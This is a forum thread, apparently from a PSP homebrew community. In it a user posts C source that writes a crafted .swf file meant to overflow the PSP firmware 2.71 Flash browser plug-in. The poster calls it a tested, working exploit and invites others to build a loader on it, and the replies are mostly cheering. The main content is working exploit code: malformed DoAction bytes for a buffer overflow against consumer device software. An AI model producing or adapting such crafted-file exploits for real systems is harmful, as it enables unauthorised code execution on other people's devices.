New Exploite for 2.7/2.71

[CoderX]

Hello Coder X here, Below it the code for an Bufferoverrun exploite i found using the PSP 2.71 flash browser plug-in

This exploite bassed on a pc exploite (writen by a PC-Coder Named BassReFLeX)

Yes the code needs to be compiled and then you make the swf file.
(Sorry to complacate, but it must be done) next the file needs to be converted to a format the psp can read. "Use one of the thousands of sfw verson converters avalable"

Any one intrested in using the exploite and making a e-loader, please give me credit for the exploite, and contact me, we can work togeter to make it.

This is a tested exploite and does work, so i hope you all enjoy, 2.71 uses Welcome to Homebrew

I will be working on a bin for the program so expect tetris or something out in a bit.

Code:

/*
* ***********************************************************
* PSP FW 2.71 Overflow Test
*************************************************************
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";

//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";

//[DoAction] 1 pwn j00r 455!
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00";

//[ShowFrame]
char ShowFrame[] = "\x40\x00";

//[End]
char End[] = "\x00\x00";

int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************************* *");
printf("\n* Sony you can kiss my ass, 2.71 Welcome to Homebrew *");
printf("\n* ********************************************************* *");


if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}

printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF),f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}

void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}

[Kramer]

**** yeah thats another on for the homebrew scene now sony will really start getting pissed off

[D0N]

OMG This **** is off the hook! Good work CoderX!

[BrooksyX]

I sure hope this works out for all the 2.7 plus users.

[CoderX]

I practicaly went nut when it worked, well its been 37 hours with out sleep, good night

[ACID]

I practicaly went nut when it worked, well its been 37 hours with out sleep, good night

Take a well deserved rest that looks great. Another point for the homebrew comunity. Yeah

[acn010]

really?!?!?!?!
oh man!
lmao oh wow thats amazing

[oafan]

this is great news for 2.70/2.71 users, i wonder if sony will just throw out a useless update soon

[Zion]

Great job!

[D0N]

I wonder if Fanjita could make an eloader out of this? Probably could...